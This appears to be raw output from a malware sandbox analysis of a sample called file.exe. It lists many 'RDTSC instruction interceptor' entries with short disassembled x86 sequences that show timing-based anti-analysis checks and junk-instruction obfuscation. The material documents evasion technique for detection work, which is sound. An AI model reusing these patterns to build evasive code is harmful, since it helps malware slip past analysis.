                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C09FD second address: 12C0A7D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8ED0E3C3DEh 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pop ebx 0x00000015 nop 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 xor bl, 00000034h 0x00000027 mov eax, dword ptr [ebp+122D0F39h] 0x0000002d push eax 0x0000002e jbe 00007F8ED0E3C3DCh 0x00000034 add ebx, dword ptr [ebp+12461B72h] 0x0000003a pop ebx 0x0000003b push FFFFFFFFh 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F8ED0E3C3D8h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000018h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 mov edi, ebx 0x00000059 nop 0x0000005a jng 00007F8ED0E3C3ECh 0x00000060 pushad 0x00000061 jmp 00007F8ED0E3C3DEh 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C185E second address: 12C1864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C1864 second address: 12C18E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F8ED0E3C3D8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D1B98h] 0x0000002d movzx edi, si 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F8ED0E3C3D8h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c mov dword ptr [ebp+12461300h], ecx 0x00000052 push 00000000h 0x00000054 mov bx, 5239h 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F8ED0E3C3E6h 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C283C second address: 12C2878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edx 0x00000009 call 00007F8ED0C920C8h 0x0000000e pop edx 0x0000000f mov dword ptr [esp+04h], edx 0x00000013 add dword ptr [esp+04h], 0000001Dh 0x0000001b inc edx 0x0000001c push edx 0x0000001d ret 0x0000001e pop edx 0x0000001f ret 0x00000020 cmc 0x00000021 push 00000000h 0x00000023 stc 0x00000024 push 00000000h 0x00000026 sub dword ptr [ebp+122D2D29h], ecx 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C1B27 second address: 12C1B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8ED0E3C3E5h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C1B4A second address: 12C1B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C29C1 second address: 12C29C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3B26 second address: 12C3B35 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C29C5 second address: 12C29CF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8ED0E3C3DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C46DF second address: 12C46E9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3B35 second address: 12C3B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C29CF second address: 12C29DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C46E9 second address: 12C46EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3B39 second address: 12C3B3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C46EF second address: 12C46F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C29DB second address: 12C29DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3B3D second address: 12C3B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C46F3 second address: 12C4783 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F8ED0C920CAh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F8ED0C920C8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d push eax 0x0000002e add dword ptr [ebp+122D1834h], esi 0x00000034 pop edi 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D1834h], eax 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push esi 0x00000042 call 00007F8ED0C920C8h 0x00000047 pop esi 0x00000048 mov dword ptr [esp+04h], esi 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc esi 0x00000055 push esi 0x00000056 ret 0x00000057 pop esi 0x00000058 ret 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F8ED0C920D8h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C29DF second address: 12C2A6D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 and edi, 01E36214h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 jnl 00007F8ED0E3C3D9h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 jnl 00007F8ED0E3C3DBh 0x00000028 mov eax, dword ptr [ebp+122D0109h] 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F8ED0E3C3D8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push esi 0x0000004d call 00007F8ED0E3C3D8h 0x00000052 pop esi 0x00000053 mov dword ptr [esp+04h], esi 0x00000057 add dword ptr [esp+04h], 00000019h 0x0000005f inc esi 0x00000060 push esi 0x00000061 ret 0x00000062 pop esi 0x00000063 ret 0x00000064 mov edi, dword ptr [ebp+122D354Bh] 0x0000006a mov bl, 40h 0x0000006c push eax 0x0000006d push edi 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F8ED0E3C3DAh 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4783 second address: 12C4789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4987 second address: 12C498B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C498B second address: 12C4995 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4995 second address: 12C499A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C5875 second address: 12C587B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C5A76 second address: 12C5A81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F8ED0E3C3D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C98D9 second address: 12C98DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C98DD second address: 12C98EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnp 00007F8ED0E3C3D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C98EC second address: 12C98F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F8ED0C920C6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9EA7 second address: 12C9EAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9EAC second address: 12C9EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9EB2 second address: 12C9EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F8ED0E3C3D6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9EC4 second address: 12C9EDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9EDA second address: 12C9EE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8ED0E3C3D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9F91 second address: 12C9FAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CBF3A second address: 12CBF40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDFB8 second address: 12CDFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDFBC second address: 12CDFD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDFD2 second address: 12CDFE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8ED0C920CEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D07BE second address: 12D07DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F8ED0E3C3DEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0DC7 second address: 12D0E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnl 00007F8ED0C920CCh 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f jmp 00007F8ED0C920D9h 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 pop edi 0x00000018 nop 0x00000019 mov edi, 40D286AEh 0x0000001e push 00000000h 0x00000020 cld 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F8ED0C920C8h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Dh 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov dword ptr [ebp+122D1A80h], esi 0x00000043 push eax 0x00000044 pushad 0x00000045 pushad 0x00000046 push esi 0x00000047 pop esi 0x00000048 push esi 0x00000049 pop esi 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F8ED0C920CCh 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1D55 second address: 12D1D9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movzx edi, cx 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D264Eh], esi 0x00000017 push 00000000h 0x00000019 jmp 00007F8ED0E3C3E7h 0x0000001e xchg eax, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pop ecx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1D9E second address: 12D1DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1DA4 second address: 12D1DB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jl 00007F8ED0E3C3D6h 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB111 second address: 12CB116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB116 second address: 12CB11C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC053 second address: 12CC059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC059 second address: 12CC05E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC05E second address: 12CC07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0C920D1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC07C second address: 12CC080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC080 second address: 12CC132 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F8ED0C920C8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 jg 00007F8ED0C920CCh 0x0000002c push dword ptr fs:[00000000h] 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F8ED0C920C8h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d add ebx, dword ptr [ebp+122D348Bh] 0x00000053 mov dword ptr fs:[00000000h], esp 0x0000005a pushad 0x0000005b jmp 00007F8ED0C920D0h 0x00000060 mov cx, si 0x00000063 popad 0x00000064 mov eax, dword ptr [ebp+122D0191h] 0x0000006a jp 00007F8ED0C920CCh 0x00000070 mov ebx, dword ptr [ebp+122D1BF3h] 0x00000076 push FFFFFFFFh 0x00000078 mov ebx, dword ptr [ebp+122D1816h] 0x0000007e nop 0x0000007f jnp 00007F8ED0C920CEh 0x00000085 push eax 0x00000086 push eax 0x00000087 push edx 0x00000088 push edi 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC132 second address: 12CC137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC137 second address: 12CC13D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2F4D second address: 12D2F52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE759 second address: 12CE75F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE75F second address: 12CE763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA1C8 second address: 12CA1D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D200F second address: 12D2015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2015 second address: 12D2026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D407E second address: 12D4084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D7997 second address: 12D79B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F8ED0C920D3h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D79B8 second address: 12D79BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D79BC second address: 12D79C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126E6DC second address: 126E6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0E3C3E8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126E6F8 second address: 126E73A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F8ED0C920CBh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F8ED0C920C6h 0x0000001e jmp 00007F8ED0C920D3h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126E73A second address: 126E749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F8ED0E3C3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B096 second address: 126B0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0C920CCh 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b jbe 00007F8ED0C920E5h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8ED0C920D3h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD1B7 second address: 12DD1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007F8ED0E3C3D8h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F8ED0E3C3DFh 0x00000017 pop edi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD5AB second address: 12DD5BE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jns 00007F8ED0C920C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3EF9 second address: 12E3F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3FEE second address: 12E3FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E4097 second address: 12E409B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E56CD second address: 12E56D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E56D3 second address: 12E56ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB2EE second address: 12EB305 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8ED0C920D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB5A1 second address: 12EB5BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3DCh 0x00000007 js 00007F8ED0E3C3D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB802 second address: 12EB806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EF1B0 second address: 12EF1BA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8ED0E3C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F650B second address: 12F652E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8ED0C920CEh 0x00000009 jmp 00007F8ED0C920D1h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F652E second address: 12F6532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
